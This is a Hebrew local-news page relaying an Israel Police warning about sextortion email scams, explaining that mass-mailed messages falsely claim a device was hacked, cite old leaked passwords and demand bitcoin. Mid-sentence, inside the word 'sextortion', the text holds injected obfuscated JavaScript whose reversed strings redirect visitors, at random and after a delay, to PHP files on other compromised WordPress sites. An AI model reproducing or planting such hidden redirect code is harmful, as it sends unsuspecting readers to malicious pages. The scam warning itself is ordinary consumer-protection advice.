fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

אזהרה לציבור: הונאת סחיטה במיילים על רקע מיני

משטרת ישראל מבקשת להביא לידיעת הציבור כי בימים האחרונים הם מזהים עלייה ניכרת בהונאות סחיטה מקוונת על רקע מיני ("sex$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tortion"), בעיקר באמצעות הודעות דואר אלקטרוני. מגמה זו באה לידי ביטוי גם בגידול במספר התלונות המתקבלות במשטרה אודות הודעות דרישת כופר באמצעות הדוא"ל.
סחיטה ברשת | צילום: pexels
סחיטה ברשת | צילום: pexels

אגף חקירות ומודיעין של משטרת ישראל מדווחים כי מספר התלונות בציבור בקרב סחיטה ברשתות ובמיילים גדלה בימים האחרונים ומבקשים לשים לב לפרטים הבאים:

אז איך זה עובד?

1) הקורבן מקבל הודעת דוא"ל שנשלחה בדיוור (ב"דיוור" הכוונה להודעות שנשלחו בו-זמנית בתפוצה רחבה) ובה נטען כי חדרו לתוך המחשב או הטלפון שלו.

2) בהודעה נטען כי תכנים אישיים אודות הקורבן, כולל תמונות וסרטונים אינטימיים שלו, יפורסמו במידה ולא ישלם כופר, בד"כ במטבעות קריפטוגרפיים (לרוב – Bitcoin).

3) לעיתים, לטקסט מצורפים גם נתונים אישיים של הקורבן דוגמת סיסמאות ישנות ממאגרי מידע שנפרצו ודלפו לרשת – דבר המחזק כביכול את האפשרות שאכן אירעה פריצה למחשבכם.

4) מניסיוננו, ברוב המוחלט של המקרים, מדובר בהודעת דואר זבל אלקטרוני גנרית ומומלץ להתעלם. שולח ההודעה פועל ב"שיטת מצליח", תוך שליחת מספר רב של הודעות לשלל קורבנות פוטנציאליים – בהנחה שלפחות חלק מהם יפלו בפח וישלמו את סכום הסחיטה.

חשוב לציין – אם אין בידיכם אינדיקציות המעידות על כך שאכן המחשב או הטלפון שלכם נפרץ – יש להניח כי מי ששלח את ההודעה אינו מחזיק במידע אישי שלכם.

אנו ממליצים להעביר הודעה זו לבני משפחה וחברים על מנת להזהיר אותם משיטת סחיטה זו. משטרת ישראל תמשיך לפעול בכל עת כנגד תופעות פשיעה במרחב המקוון.

דוגמא לסחיטה שנשלחה באמצעות הודעת דוא"ל:

סחיטה בדואר אלקטרוני | צילום: באדיבות משטרת ישראל
סחיטה בדואר אלקטרוני | צילום: באדיבות משטרת ישראל
לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות